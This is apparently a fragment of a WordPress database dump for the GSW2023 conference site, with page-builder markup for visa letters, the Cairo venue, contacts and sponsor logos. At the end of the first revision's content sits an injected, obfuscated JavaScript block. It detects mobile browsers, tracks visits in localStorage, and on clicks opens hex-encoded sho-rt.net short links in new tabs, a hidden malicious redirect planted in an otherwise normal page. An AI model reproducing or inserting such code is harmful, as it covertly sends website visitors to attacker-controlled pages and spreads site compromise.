sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:07:53','2023-08-16 00:07:53','',3066,'https://gsw2023.com/?p=5237',0,'revision','',0),
(5238,1,'2023-08-16 00:13:24','2023-08-16 00:13:24','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img 